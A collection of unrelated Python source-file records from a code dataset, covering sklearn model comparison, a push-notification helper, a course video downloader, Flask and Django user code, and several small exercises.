RadiusNeighborsRegressor\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn import svm\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.datasets import load_iris\n\n\ndata = pd.read_csv('kickstarter_filtered.tsv', sep='\\t', nrows=100)\ndata = data[['main_category', 'category', 'country', 'duration',\n 'currency', 'goal_in_usd', 'pledged_in_usd',\n 'percentage_of_money_collected', 'backers', 'state']]\n\ndata['main_category']=data['main_category'].factorize()[0]\ndata['category']=data['category'].factorize()[0]\ndata['country']=data['country'].factorize()[0]\ndata['currency']=data['currency'].factorize()[0]\ndata['state']=data['state'].factorize()[0]\n\ndef best_params(model, params, cv, x_train, y_train):\n grid = GridSearchCV(model, params, cv=cv)\n grid.fit(x_train, y_train)\n best_options = grid.best_params_\n return best_options\n\n\ndef prediction(model, x_train, y_train, x_test, y_test, cv):\n model.fit(x_train, y_train)\n score_val = np.mean(cross_val_score(model, x_train, y_train, cv=cv))\n y_pred = model.predict(x_test)\n score_acc = accuracy_score(y_test, y_pred)\n score = model.score(x_train, y_train)\n return score_val, score_acc, score\n\ndef prediction_reg(model, x_train, y_train, x_test, y_test, cv):\n model.fit(x_train, y_train)\n score_val = np.mean(cross_val_score(model, x_train, y_train, cv=cv))\n y_pred = model.predict(x_test)\n score_acc = None\n score = model.score(x_train, y_train)\n return score_val, score_acc, score\n\n\ndef normalize_data(x_train, x_test):\n scaler = MinMaxScaler()\n scaler.fit(x_train)\n x_train_norm = scaler.transform(x_train)\n x_test_norm = scaler.transform(x_test)\n return x_train_norm, x_test_norm\n\n\n# iris = load_iris()\n# x = iris['data']\n# y = iris['target']\n\nx = data.drop(columns=['state'], axis=1)\ny = data['state']\n\n# train/test split\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\nx_train_norm, x_test_norm = normalize_data(x_train, x_test)\n\n\n\n# DecisionTreeClassifier\ndtc = DecisionTreeClassifier()\ndtc_params = {\"criterion\": [\"gini\", \"entropy\"],\n \"splitter\": [\"best\", \"random\"]}\ndtc_best_params = best_params(dtc, dtc_params, 3, x_train, y_train)\ndtc_best = DecisionTreeClassifier(**dtc_best_params)\ndtc_result = prediction(dtc_best, x_train, y_train, x_test, y_test, cv=3)\n\n# DecisionTreeRegressor\ndtr = DecisionTreeRegressor()\ndtr_params = {\"criterion\": [\"mse\", \"friedman_mse\", \"mae\"],\n \"splitter\": [\"best\", \"random\"]}\ndtr_best_params = best_params(dtr, dtr_params, 3, x_train, y_train)\ndtr_best = DecisionTreeRegressor(**dtr_best_params)\ndtr_result = prediction_reg(dtr_best, x_train, y_train, x_test, y_test, cv=3)\n\n\n\n\n# KNeighborsClassifier\nknc = KNeighborsClassifier()\nknc_params = {'weights': [\"uniform\", \"distance\"],\n 'p': [1, 2],\n 'n_neighbors': np.arange(1, 40)}\nknc_best_params = best_params(knc, knc_params, 3, x_train_norm, y_train)\nknc_best = KNeighborsClassifier(**knc_best_params)\nknc_result = prediction(knc_best, x_train_norm, y_train, x_test_norm, y_test, cv=3)\n\n# # RadiusNeighborsClassifier\n# rnc = RadiusNeighborsClassifier()\n# rnc_params = {}\n# rnc_best_params = best_params(rnc, rnc_params, 3, x_train_norm, y_train)\n# rnc_best = RadiusNeighborsClassifier(**rnc_best_params)\n# rnc_result = prediction(rnc_best, x_train_norm, y_train, x_test_norm, y_test, 
cv=3)\n\n# KNeighborsRegressor\nknr = KNeighborsRegressor()\nknr_params = {'weights': [\"uniform\", \"distance\"],\n 'p': [1, 2],\n 'n_neighbors': np.arange(1, 40)}\nknr_best_params = best_params(knr, knr_params, 3, x_train_norm, y_train)\nknr_best = KNeighborsRegressor(**knr_best_params)\nknr_result = prediction_reg(knr_best, x_train_norm, y_train, x_test_norm, y_test, cv=3)\n\n# RadiusNeighborsRegressor\nrnr = RadiusNeighborsRegressor()\nrnr_params = {}\nrnr_best_params = best_params(rnr, rnr_params, 3, x_train_norm, y_train)\nrnr_best = RadiusNeighborsRegressor(**rnr_best_params)\nrnr_result = prediction_reg(rnr_best, x_train_norm, y_train, x_test_norm, y_test, cv=3)\n\n\n\n# RandomForestClassifier\nrfc = RandomForestClassifier()\nrfc_params = {\"n_estimators\": np.arange(10, 15, 1),\n \"min_samples_split\": np.arange(2, 5, 1),\n \"min_samples_leaf\": np.arange(1, 5, 1),\n \"criterion\": [\"gini\", \"entropy\"]}\nrfc_best_params = best_params(rfc, rfc_params, 3, x_train, y_train)\nrfc_best = RandomForestClassifier(**rfc_best_params)\nrfc_result = prediction(rfc_best, x_train, y_train, x_test, y_test, cv=3)\n\n# RandomForestRegressor\nrfr = RandomForestRegressor()\nrfr_params = {\"n_estimators\": np.arange(10, 15, 1),\n \"min_samples_split\": np.arange(2, 5, 1),\n \"min_samples_leaf\": np.arange(1, 5, 1),\n \"criterion\": [\"mse\", \"mae\"]}\nrfr_best_params = best_params(rfr, rfr_params, 3, x_train, y_train)\nrfr_best = RandomForestRegressor(**rfr_best_params)\nrfr_result = prediction_reg(rfr_best, x_train, y_train, x_test, y_test, cv=3)\n\n\n\n# SVM\nsvm_model = svm.SVC()\nsvm_params = {'kernel': ['linear'],\n 'gamma': ['scale','auto']}\nsvm_best_params = best_params(svm_model, svm_params, 2, x_train, y_train)\nsvm_best = svm.SVC(**svm_best_params)\nsvm_result = prediction(svm_best, x_train, y_train, x_test, y_test, cv=3)\n\n\n\n# Bayes\nbayes_model = GaussianNB()\nbayes_params = {'priors': [None]\n #'var_smoothing': [1e-9]\n }\nbayes_best_params = best_params(bayes_model, bayes_params, 2, x_train, y_train)\nbayes_best = GaussianNB(**bayes_best_params)\nbayes_result = prediction(bayes_best, x_train, y_train, x_test, y_test, cv=3)\n\n\n\n\nall_results = [['DecisionTreeClassifier', *dtc_result],\n ['DecisionTreeRegressor', *dtr_result],\n ['KNeighborsClassifier', *knc_result],\n #['RadiusNeighborsClassifier', *rnc_result],\n ['KNeighborsRegressor',*knr_result],\n ['RadiusNeighborsRegressor',*rnr_result],\n ['RandomForestClassifier', *rfc_result],\n ['RandomForestRegressor', *rfr_result],\n ['SVM', *svm_result],\n ['Bayes', *bayes_result]\n ]\n\n\nresult_df = pd.DataFrame(all_results, columns=[\"model\", \"mean_val_score\", \"accuracy_score\", \"score\"])\nprint(result_df)\n","sub_path":"projekt_ml/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":6753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"449949879","text":"import requests\n\nfrom .shell import Console, red, white, yellow\nfrom .config import cfg\n\nSHL = Console(\"Utils - pushedNotifications\", cls=False)\n\n\ndef send_notification(text: str, debug: bool = False, url_content: str = \"\"):\n\n data = cfg.get(\"pushed_co_config\")\n if data is None:\n SHL.output(f\"{red}./secret_pushed.json not found.{white}\")\n return\n\n if text.strip():\n payload = data['payload']\n payload[\"content\"] = text[:139] # max limit\n\n if url_content.strip():\n payload[\"content_type\"] = \"url\"\n payload[\"content_extra\"] = url_content
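\n\n # POST the notification payload to the Pushed.co push API.\n r = 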
requests.post(\"https://api.pushed.co/1/push\", data=payload)\n\n if debug:\n SHL.output(r.text)\n return r\n\n else:\n SHL.output(f\"{yellow}Please provide a text.{white}\")\n","sub_path":"src/utils/pushedNotification.py","file_name":"pushedNotification.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"445096499","text":"myinput='''29\n7 20 35 1 29 30 34 27 12 41 28 15 37 14 45 44 3 16 4 0 39 26 36 49 6 18 40 47 33'''\ndatas=myinput.split(\"\\n\")\ndatas.pop(0)\ndatas=list(map(int,datas[0].split()))\nsuits = ['Clubs', 'Spades', 'Diamonds', 'Hearts']\nranks = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'Jack', 'Queen', 'King', 'Ace']\ndef count_value(item):\n\tsuit_value=item//13\n\trank_value=item%13\n\tprint(\"{}-of-{}\".format(ranks[rank_value],suits[suit_value]),end=\" \")\nfor elements in datas:\n\tcount_value(elements)\n","sub_path":"Card_Names.py","file_name":"Card_Names.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"69515012","text":"import numpy as np\nimport pandas as pd\nimport math\n\nclass HeartFailure(object):\n\n def __init__(self):\n \"\"\" Class constructor for HeartFailure.\n \"\"\"\n\n def check_if_int(self, data):\n \"\"\" This function determines whether a column Series contains\n values that are all integers or not. Depending on the answer,\n the return type could change.\n \n Arguments:\n data {Series} - a column Series\n Returns:\n There are two options that can be returned:\n 1. Boolean - True or False (If data is all integers).\n 2. Boolean and Vector Array (If data contains at least \n one non-integer value).\n \"\"\"\n # Create a temporary blank list.\n temp = []\n \n # Iterate over the elements in data and check whether they are an \n # integer using the modulo logic. If the data is not an integer,\n # add the index of that element to the list called temp.\n for x in range(len(data)):\n if data[x] % 1 != 0:\n temp.append(x)\n \n # Assume that all values are integers.\n is_int = True\n \n # Check whether the count of temp list exceeds 0. If it does,\n # then it means that there is an element that is not an integer.\n # Then convert the temp list into an array.\n if len(temp) > 0:\n is_int = False\n index = np.array(temp)\n \n # This conditional statement will return only a Boolean value if\n # data is all integers. Otherwise, it will also return an array of \n # the indeces where there are non-integer values.\n if is_int == True:\n return is_int\n else:\n return [is_int, index]\n \n def drop_outliers(self, data, field):\n \"\"\"\n \"\"\"\n \n distance = 1.5 * (np.percentile(data[field], 75) - np.percentile(data[field], 25))\n \n data.drop(data[data[field] > distance + np.percentile(data[field], 75)].index, inplace=True)\n data.drop(data[data[field] < np.percentile(data[field], 25) - distance].index, inplace=True)\n \n def get_mean_difference(self, data):\n \"\"\" This function gets the difference between the means of two\n groups.\n \n Arguments:\n data {DataFrame}\n Returns:\n means {Series} - contains the difference of means for the\n groups.\n \"\"\"\n # Create a temporary blank list.\n temp = []\n\n # Get the number of columns in the DataFrame.\n col = data.shape[1]\n\n # Iterate the number of columns and only select the column having\n # the data for means. Since there is only two groups, the subtraction\n # will be hardcoded. 
There are two possible scenarios where the first\n # mean is larger than the second mean or vice versa. When the difference\n # is acquired, add it to the temporary list.\n for x in range(col):\n if x % 2 == 0:\n if data.loc[0][x] >= data.loc[1][x]:\n diff = data.loc[0][x] - data.loc[1][x]\n temp.append(diff)\n elif data.loc[0][x] < data.loc[1][x]: \n diff = data.loc[1][x] - data.loc[0][x]\n temp.append(diff)\n\n # Convert the list to a Series.\n means = pd.Series(temp)\n\n return means\n \n def get_month(self, data):\n \"\"\" This function returns the month of 2015 that each day number\n falls in.\n \n Arguments:\n data {Series} - a column Series of day numbers\n Returns:\n month {Series} - a column Series of month numbers\n \"\"\"\n\n # Create an empty list.\n month = []\n \n # Get the length of data.\n total_size = len(data)\n\n # Iterate over the elements and check which month of 2015 each \n # day number belongs to. \n for x in range(total_size):\n if data.values[x] >= 1 and data.values[x] <= 31:\n month.append(1)\n elif data.values[x] >= 32 and data.values[x] <= 58:\n month.append(2)\n elif data.values[x] >= 59 and data.values[x] <= 89:\n month.append(3)\n elif data.values[x] >= 90 and data.values[x] <= 119:\n month.append(4)\n elif data.values[x] >= 120 and data.values[x] <= 150:\n month.append(5)\n elif data.values[x] >= 151 and data.values[x] <= 180:\n month.append(6)\n elif data.values[x] >= 181 and data.values[x] <= 211:\n month.append(7)\n elif data.values[x] >= 212 and data.values[x] <= 243:\n month.append(8)\n elif data.values[x] >= 244 and data.values[x] <= 273:\n month.append(9)\n elif data.values[x] >= 274 and data.values[x] <= 304:\n month.append(10)\n elif data.values[x] >= 305 and data.values[x] <= 334:\n month.append(11)\n elif data.values[x] >= 335 and data.values[x] <= 365:\n month.append(12)\n\n # Convert the list to a Series.\n month = pd.Series(month)\n\n return month\n","sub_path":"heart_failure.py","file_name":"heart_failure.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"362481068","text":"print(\"Project Euler - Problem 4\")\n\n# Palindrome checker\ndef isNumPalindrome(number):\n numInStr = str(number)\n\n # Even and odd branching\n leng = len(numInStr)\n if(leng%2 == 0): # Even\n leftStr = numInStr[:int(leng/2)]\n rightStr = numInStr[int(leng/2):]\n if(leftStr == rightStr[::-1]):\n return True\n else:\n return False\n else: # Odd\n leftStr = numInStr[:int(leng/2)]\n rightStr = numInStr[int(leng/2 + 1):]\n if(leftStr == rightStr[::-1]):\n return True\n else:\n return False\n\n# Main\nbiggestP = 0\nfor i in range(1, 1000):\n for j in range(1, 1000):\n temp = i*j\n if(isNumPalindrome(temp)):\n if(temp > biggestP):\n biggestP = temp\n print(\"Update: biggestP = \" + str(biggestP))\nprint(\"Ans: \" + str(biggestP))\n\n","sub_path":"P4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"477048771","text":"# -*- coding: utf-8 -*-\nimport json\nimport os\nimport re\nimport configparser\nfrom bs4 import BeautifulSoup\n\nimport model\n\ncourse_url = \"\"\n\n# Loading config\nconfig = configparser.ConfigParser()\nconfig.read(\"settings.conf\", encoding=\"utf-8-sig\")\n# Download_Setting\nDownload_Path = config[\"xuetangx\"][\"Download_Path\"]\n\n# Session\nsession = model.login_session(site=\"xuetangx\", conf=config)\n\n\ndef mk_dir(path):\n if 
not os.path.exists(path):\n os.makedirs(path)\n\n\nclass VideoInfo:\n sources = []\n sd = hd = \"\"\n\n def load(self, resp_json):\n self.sources = resp_json['sources']\n if resp_json['sources']:\n self.sd = self.sources['quality10'][0]\n self.hd = self.sources['quality20'][0]\n return self\n\n\n# Find the course id in the user-supplied url\ndef main(course_url):\n if not re.search(r\"courses/([\\w:+-]+)/?\", course_url):\n print(\"No course Id, please check!\")\n return\n else:\n course_id = re.search(r\"courses/([\\w:+-]+)/?\", course_url).group(1)\n main_page = f\"http://www.xuetangx.com/courses/{course_id}\"\n info = model.out_info(f\"{main_page}/about\", Download_Path)\n main_path = f\"{Download_Path}\\\\{info.path}\"\n\n # Fetch the course contents page\n menu_raw = session.get(url=\"{0}/courseware\".format(main_page))\n # Check what we actually got back\n if menu_raw.url.find(\"about\") == -1 and menu_raw.url.find(\"login\") == -1: # contents fetched successfully\n # The final url tells us what happened:\n # 1. logged in but not enrolled in the course -> redirected to the ../about page\n # 2. not logged in (or wrong password) -> redirected to http://www.xuetangx.com/accounts/login?next=..\n menu_bs = BeautifulSoup(menu_raw.text, \"html5lib\")\n chapter = menu_bs.find_all(\"div\", class_=\"chapter\")\n # Parse the chapter information\n for week in chapter:\n week_name = week.h3.a.string.strip()\n model.mkdir_p(f\"{main_path}/{week_name}\")\n # week_content = []\n for lesson in week.ul.find_all(\"a\"):\n # Parse the lesson information\n lesson_name = lesson.p.string.strip() # main title\n lesson_bs = BeautifulSoup(session.get(url=f\"http://www.xuetangx.com{lesson['href']}\").text, \"html5lib\")\n tab_list = {}\n for tab in lesson_bs.find_all(\"a\", role=\"tab\"):\n tab_list[tab.get('id')] = re.search(\"(.+)\", tab.get('title')).group(1)\n for seq in lesson_bs.find_all('div', class_=\"seq_contents\"):\n if re.search(r\"data-type=[\\'\\\"]Video[\\'\\\"]\", seq.text): # video unit\n # seq_name = tab_list[seq.get(\"aria-labelledby\")]\n lesson_ccsource = re.search(r\"data-ccsource=[\\'\\\"](.+)[\\'\\\"]\", seq.text).group(1)\n r = session.get(url=f\"http://www.xuetangx.com/videoid2source/{lesson_ccsource}\")\n video = VideoInfo().load(resp_json=json.loads(r.text))\n if video.sources is not None:\n dllink = video.hd\n if re.search(\"a href=\\\"(.+/download)\\\"\", seq.text):\n srt_dllink = \"http://www.xuetangx.com{0}\".format(\n re.search(\"a href=\\\"(.+/download)\\\"\", seq.text).group(1))\n # print(week_name, lesson_name, dllink, srt_dllink)\n print(\"{2} \\\"{0} {1}.mp4\\\"\".format(week_name, lesson_name, dllink))\n download_file_name = f\"{main_path}/{week_name}/{lesson_name}.mp4\"\n model.resume_download_file(session=session, filename=download_file_name, url=dllink)\n else: # not logged in or not enrolled in this course\n print(\"Something went wrong: you may not have joined this course, or the password is wrong.\")\n return\n else: # course page not found\n print(\"Could not find this course\")\n return\n\n\nif __name__ == '__main__':\n main(course_url)\n","sub_path":"xuetangx-dl.py","file_name":"xuetangx-dl.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"447226122","text":"from flask import request\nfrom flask import url_for\nfrom flask import jsonify\nfrom flask import session\nfrom flask import Blueprint\n\nimport inspect\nfrom termcolor import colored\nfrom functools import wraps\n\nfrom ..models import User\n\n# 'api' is the blueprint's name\nmain = Blueprint('api', __name__)\n\n\n# Get the currently logged-in user from the session\ndef current_user():\n # print('session, debug', session.permanent)\n username = session.get('username', '')\n u = User.query.filter_by(username=username).first()\n return u
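\n\n\n\n# Debug helper: inspects the caller's source line so that each argument's\n# expression can be printed next to its value and type.\ndef log(*args):\n try:\n 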
frame = inspect.getframeinfo(inspect.currentframe().f_back)\n line_number = frame[1]\n for line in frame[3]:\n begin = line.find('(') + 1\n end = line.rfind(')')\n nameList = line[begin:end].split(',')\n for name, value in zip(nameList, args):\n print(''.join([colored(\"debug \", \"blue\"), colored(\"{}\".format(name), attrs=['bold']),\n colored(\" ---> \", \"white\"), colored('{} {} {}'.format(value, type(value), line_number))]))\n except:\n print(colored(\"debug \", \"red\") + \"something wrong\")\n\ndef login_required(f):\n @wraps(f)\n def function(*args, **kwargs):\n if current_user() is None:\n r = {\n 'success': False,\n 'message': '未登录',\n }\n return jsonify(r)\n return f(*args, **kwargs)\n return function\n\nfrom . import tweet\nfrom . import upload_files\nfrom . import user\n","sub_path":"app/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"324679596","text":"\"\"\"\nSome constants which you could use in your code. You can add more constants\nif you want to, but please refrain from deleting any as there might be some\nsample code that could be using these variables.\n\"\"\"\n# exit status of the program\nSUCCESS = 0\nERROR = 1\n\n# some constant values that are being/can be used as dictionary keys to\n# store information or be used as strings to represent an information\n# and also communicate with other machines\n\n# to indicate that the synchronization of criu dump between ACTIVE and STANDBY\n# is complete\nCOMPLETED = \"completed\"\n# the key used as an argument for communicating the dump status\nDUMP = \"dump\"\n# to indicate that the monitoring service is about to start to dump\nDUMPING = \"dumping\"\n# to indicate that the pair is ACTIVE\nACTIVE = \"active\"\n# to indicate that the pair is in STANDBY\nSTANDBY = \"standby\"\n\n# the Process ID of the current program\nPID = \"pid\"\n# the port at which the current program is running\nPORT = \"port\"\n\n# number of seconds the program should sleep\nSLEEP_TIME = 1\n\n# URLS supported by the webserver\nREGISTER_PATH = \"/register\"\nACTIVE_PATH = \"/active\"\nSTANDBY_PATH = \"/standby\"\nCOMPUTE_PATH = \"/compute\"\nDUMPING_PATH = \"/dumping\"\n\n# the param sent with /compute path\nNUM = \"num\"\n\n# some of the status codes for HTTP\nSTATUS_OK = 200\nBAD_GATEWAY = 502\nNOT_FOUND = 404\n","sub_path":"scenario-3.1/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"388554252","text":"import numpy as np\r\nA = {'a':1,'b':0.9,'c':0.85}\r\nB = {'a':0.9,'b':0.7,'c':0.6}\r\nC = dict()\r\nX = np.array([[0.5, 0.1],[0.2, 0.9],[0.8,0.6]])\r\nY = np.array([[0.6,0.4,0.7],[0.5,0.8,0.9]])\r\n_A = {}\r\n_B = {}\r\ndef Union(A,B):\r\n for key in A:\r\n if A[key]>B[key]:\r\n C[key] = A[key]\r\n else:\r\n C[key] = B[key]\r\n print(\"A U B :\",C)\r\n\r\ndef Intersection(A,B, f=0):\r\n for key in A:\r\n if A[key]>>import linreg\nLoading training data...\nDone. Time (min) = 5.025\nLoading teting data...\nDone. 
Time (min) = 1.488\n>>> linreg.train_and_test(6000)\n2.709085063545118\n\"\"\"\nimport dataloader\nfrom sklearn import linear_model\nfrom sklearn import metrics\nimport pandas as pd\n\ntrain = dataloader.train\ntest = dataloader.test\n\ndef train_and_test(num_features, model_type = 'ols', alpha = 1.0):\n \"\"\"Trains a linear regression model and tests its predictions.\n\n Args: \n num_features: the number of features to filter by Spearman coefficient\n model_type: 'ols' - ordinary least squares\n 'ridge' - ridge regression (l2 regularization)\n alpha: parameter for ridge regression, higher alpha means more regularized\n \n Returns: \n test_mae: the mean absolute error (MAE) of the model on the testing data.\n \"\"\"\n indices = dataloader.get_filtered_indices(num_features)\n x_train = train[:,indices]\n y_train = train[:,0]\n x_test = test[:,indices]\n y_test = test[:,0]\n model = linear_model.LinearRegression()\n if model_type == 'ridge':\n model = linear_model.Ridge(alpha = alpha)\n model.fit(x_train, y_train)\n y_pred_test = model.predict(x_test)\n test_mae = metrics.mean_absolute_error(y_pred_test,y_test)\n return test_mae\n \n\ndefault_ns = [2 ** n for n in range(18)]\ndefault_alphas = [n/10 for n in range(1,11)]\ndef test_all(ns = default_ns, alphas = default_alphas):\n \"\"\"Performs a series of tests across a range of num_features and alphas.\n \n Exports results to ../data/linreg.csv.\n \"\"\"\n df = pd.DataFrame()\n df['num_features'] = ns\n test_maes = []\n for n in ns:\n print(f'training OLS with {n} features')\n test_mae = train_and_test(n, 'OLS')\n test_maes.append(test_mae)\n df['ols'] = test_maes\n for alpha in alphas:\n test_maes = []\n for n in ns:\n print(f'training ridge with {n} features and alpha = {alpha}')\n test_mae = train_and_test(n, 'ridge', alpha)\n test_maes.append(test_mae)\n df[f'Ridge (alpha={alpha})'] = test_maes\n df.to_csv('../data/linreg.csv', index=False)\n \n\n\n\n ","sub_path":"src/linreg.py","file_name":"linreg.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"277811448","text":"# -*- coding: utf8 -*-\n'''\nCreated on 10 March 2015\n\n@author: pyol6775\n'''\n\nfrom core.utils.constants import GROUP_NAME_SUPERVISOR\nfrom core.models import Supervisor\nfrom rest_framework import serializers\nfrom django.contrib.auth.models import Group\nfrom core.serializers.UserSerializer import UserSerializer, UserUpdateSerializer, createUser, updateUser, getEntity_List, inactivateUser\nfrom core.exceptions.exceptionslist import UserCreationFailed, UserUpdateFailed \nfrom core.exceptions.exceptionslist import UserNotExist\nfrom django.core.exceptions import ObjectDoesNotExist\nimport logging\nlogger = logging.getLogger(__name__) \n\nclass SupervisorSerializer(serializers.HyperlinkedModelSerializer):\n user = UserSerializer(required=True)\n class Meta():\n model = Supervisor\n fields = ('id', 'user', 'type')\n \n def create(self, validated_data):\n user_data = validated_data.pop('user')\n env = validated_data.pop('env')\n return createSupervisor(user_data, env)\n \n \nclass SupervisorUpdateSerializer(serializers.HyperlinkedModelSerializer):\n user = UserUpdateSerializer(required=True)\n class Meta():\n model = Supervisor\n fields = ('id', 'user')\n \n def update(self, instance, validated_data):\n return updateSupervisor(instance, validated_data)\n \n \ndef createSupervisor(user_data, env):\n try:\n user = None\n user = createUser(user_data)
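\n # Attach the new auth user to a Supervisor record; if anything below\n # fails, the except block deletes the partially created user.\n supervisor = 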
Supervisor.objects.create(user=user, env=env )\n s_group = Group.objects.get(name=GROUP_NAME_SUPERVISOR)\n user.groups = [s_group]\n logger.info('create supervisor username={}'.format(user.username))\n supervisor.save()\n return supervisor\n except Exception as e:\n logger.error(e) \n if user:\n user.delete()\n raise UserCreationFailed\n \n\ndef updateSupervisor(instance, validated_data):\n try:\n user_data = validated_data.pop('user')\n user = instance.user\n updateUser(user, user_data)\n instance.save()\n logger.info('update supervisor username={}'.format(user.username))\n return instance\n except Exception as e:\n logger.error(e)\n raise UserUpdateFailed \n\ndef getSupervisorList():\n return getEntity_List(True , Supervisor.objects.all()) \n \n\ndef inactivateSupervisor(pk):\n try:\n supervisor = Supervisor.objects.get(id=pk)\n user = supervisor.user\n logger.info('inactivate supervisor username={}'.format(user.username))\n return inactivateUser(user) \n except ObjectDoesNotExist:\n msg = ('user supervisor, id:{} does not exist.'.format(pk))\n logger.error(msg)\n raise UserNotExist\n \n \n ","sub_path":"project/core/serializers/SupervisorSerializer.py","file_name":"SupervisorSerializer.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"322191755","text":"'''\nCreated on May 29, 2013\n\n@package: ally core http\n@copyright: 2011 Sourcefabric o.p.s.\n@license: http://www.gnu.org/licenses/gpl-3.0.txt\n@author: Gabriel Nistor\n\nProvides the web name for the path.\n'''\n\nfrom ally.api.operator.type import TypeCall\nfrom ally.container.ioc import injected\nfrom ally.design.processor.attribute import requires, defines, definesIf\nfrom ally.design.processor.context import Context\nfrom ally.design.processor.execution import Abort\nfrom ally.design.processor.handler import HandlerProcessor\nfrom ally.support.util_spec import IDo\nimport logging\nimport re\n\n# --------------------------------------------------------------------\n\nlog = logging.getLogger(__name__)\n\n# --------------------------------------------------------------------\n\nclass Register(Context):\n '''\n The register context.\n '''\n # ---------------------------------------------------------------- Defined\n hintsCall = definesIf(dict)\n # ---------------------------------------------------------------- Required\n invokers = requires(list)\n doSuggest = requires(IDo)\n \nclass Invoker(Context):\n '''\n The invoker context.\n '''\n # ---------------------------------------------------------------- Defined\n path = defines(list)\n # ---------------------------------------------------------------- Required\n call = requires(TypeCall)\n location = requires(str)\n \nclass Element(Context):\n '''\n The element context.\n '''\n # ---------------------------------------------------------------- Required\n name = requires(str)\n \n# --------------------------------------------------------------------\n\n@injected\nclass PathWebNameHandler(HandlerProcessor):\n '''\n Implementation for a processor that provides the web name for path.\n '''\n \n hintName = 'webName'\n # The hint name for the call web name.\n hintDescription = '(string) The name for locating the call, simply put this is the last '\\\n 'name used in the resource path in order to identify the call.'\n # The hint description.\n \n def __init__(self):\n assert isinstance(self.hintName, str), 'Invalid hint name %s' % self.hintName\n assert isinstance(self.hintDescription, str), 
'Invalid hint description %s' % self.hintDescription\n super().__init__(Invoker=Invoker, Element=Element)\n\n def process(self, chain, register:Register, **keyargs):\n '''\n @see: HandlerProcessor.process\n \n Provides the web name for the path.\n '''\n assert isinstance(register, Register), 'Invalid register %s' % register\n if not register.invokers: return\n \n if Register.hintsCall in register:\n if register.hintsCall is None: register.hintsCall = {}\n register.hintsCall[self.hintName] = self.hintDescription\n \n aborted = []\n for invoker in register.invokers:\n assert isinstance(invoker, Invoker), 'Invalid invoker %s' % invoker\n if not invoker.call: continue # No call to process hints on.\n if not invoker.path: continue # No path to append the web name to.\n assert isinstance(invoker.call, TypeCall), 'Invalid call %s' % invoker.call\n if not self.hintName in invoker.call.hints: continue\n \n webName = invoker.call.hints[self.hintName]\n if not isinstance(webName, str) or not re.match('\\w+$', webName):\n log.error('Cannot use invalid web name \\'%s\\'; web names can only contain alphanumeric characters, at:%s',\n webName, invoker.location)\n aborted.append(invoker)\n break\n \n for el in reversed(invoker.path):\n assert isinstance(el, Element), 'Invalid element %s' % el\n if el.name:\n el.name = '%s%s' % (webName, el.name)\n break\n else:\n assert isinstance(register.doSuggest, IDo), 'Invalid do suggest %s' % register.doSuggest\n register.doSuggest('Could not process the web name at:%s', invoker.location)\n\n if aborted: raise Abort(*aborted) \n","sub_path":"components/ally-core-http/ally/core/http/impl/processor/assembler/path_web_name.py","file_name":"path_web_name.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"333074983","text":"import random\n\nn = random.randint (1,100)\n\nnum = int(input(\"Nº: \"))\n\nx = 1\n\nwhile num != n:\n\t \n\tif num > n:\n\t\tx = x + 1\n\t\tprint(\"Demasiado elevado, tenta um número menor\")\n\t\n\telse:\n\t\tx = x + 1\n\t\tprint(\"Demasiado baixo, tenta um número maior\")\n\t\n\tnum = int(input(\"Outro nº: \"))\n\t\t\nprint(\"Acertaste, o número era\", n)\nprint(\"Precisaste de\", x, \"tentativas\")\n","sub_path":"semana 4/exercicios/acertarrandom.py","file_name":"acertarrandom.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"375825901","text":"class Solution:\n def spellchecker(self, wordlist: List[str], queries: List[str]) -> List[str]:\n table1 = set(wordlist)\n table2 = {word.lower() : word for word in wordlist[::-1]}\n table3 = {}\n for word in wordlist[::-1]:\n temp = []\n for c in word.lower():\n if c in 'aeiou':\n temp.append('#')\n else:\n temp.append(c)\n table3[''.join(temp)] = word\n\n result = [''] * len(queries)\n\n for i in range(len(queries)):\n query = queries[i]\n if query in table1:\n result[i] = query\n elif query.lower() in table2:\n result[i] = table2[query.lower()]\n else:\n temp = list(query.lower())\n for j in range(len(temp)):\n if temp[j] in 'aeiou':\n temp[j] = '#'\n key = ''.join(temp)\n if key in table3:\n result[i] = table3[key]\n \n return result\n","sub_path":"0901-1000/0966-Vowel Spellchecker/0966-Vowel Spellchecker.py","file_name":"0966-Vowel Spellchecker.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
